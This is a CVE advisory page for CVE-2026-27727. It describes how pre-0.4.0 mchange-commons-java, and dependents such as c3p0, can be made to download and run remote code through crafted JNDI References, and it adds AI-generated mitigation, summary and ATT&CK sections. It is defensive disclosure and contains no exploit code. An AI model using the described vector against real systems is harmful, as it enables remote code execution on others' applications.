CVE-2026-27727
Published: 25 February 2026
Description
mchange-commons-java, a library that provides Java utilities, includes code that mirrors early implementations of JNDI functionality, including support for remote `factoryClassLocation` values, by which code can be downloaded and invoked within a running application. If an attacker can provoke an…
more
application to read a maliciously crafted `jaxax.naming.Reference` or serialized object, they can provoke the download and execution of malicious code. Implementations of this functionality within the JDK were disabled by default behind a System property that defaults to `false`, `com.sun.jndi.ldap.object.trustURLCodebase`. However, since mchange-commons-java includes an independent implementation of JNDI derefencing, libraries (such as c3p0) that resolve references via that implementation could be provoked to download and execute malicious code even after the JDK was hardened. Mirroring the JDK patch, mchange-commons-java's JNDI functionality is gated by configuration parameters that default to restrictive values starting in version 0.4.0. No known workarounds are available. Versions prior to 0.4.0 should be avoided on application CLASSPATHs.
Mitigating Controls (NIST 800-53 r5)AI
SI-2 requires timely flaw remediation, directly addressing this CVE by mandating upgrades to mchange-commons-java version 0.4.0 or later where JNDI functionality defaults to restrictive settings.
SA-22 prohibits unsupported system components, preventing inclusion of vulnerable pre-0.4.0 mchange-commons-java or dependents like c3p0 on application CLASSPATHs.
RA-5 vulnerability monitoring and scanning identifies systems with vulnerable mchange-commons-java versions, enabling targeted remediation.
Security SummaryAI
CVE-2026-27727 is a critical vulnerability in the mchange-commons-java library, which provides Java utilities and includes an independent implementation mirroring early JNDI functionality. This allows remote code download and execution via support for remote factoryClassLocation values in maliciously crafted javax.naming.Reference objects or serialized objects. The issue affects versions prior to 0.4.0, particularly when the library is on the application CLASSPATH, as seen in dependent libraries like c3p0. Although JDK implementations of similar JNDI dereferencing were hardened by defaulting com.sun.jndi.ldap.object.trustURLCodebase to false, mchange-commons-java's separate code bypasses this protection.
An attacker can exploit this remotely over the network with low complexity, requiring no privileges or user interaction (CVSS 9.8: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). By provoking an application to process a malicious Reference or serialized object, the attacker triggers the library to download and invoke arbitrary remote code, achieving full remote code execution (RCE) with high impact on confidentiality, integrity, and availability. Associated with CWE-74, exploitation targets applications using vulnerable versions of mchange-commons-java or dependents like c3p0.
Advisories recommend upgrading to mchange-commons-java version 0.4.0 or later, where JNDI functionality is gated by configuration parameters defaulting to restrictive values, mirroring the JDK's mitigation approach. No known workarounds exist, and versions prior to 0.4.0 should be removed from application CLASSPATHs. Relevant guidance appears in the library's security advisories and c3p0 documentation.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
The vulnerability enables remote code execution by exploiting a public-facing application via malicious JNDI-like Reference or serialized objects over the network, directly mapping to T1190: Exploit Public-Facing Application.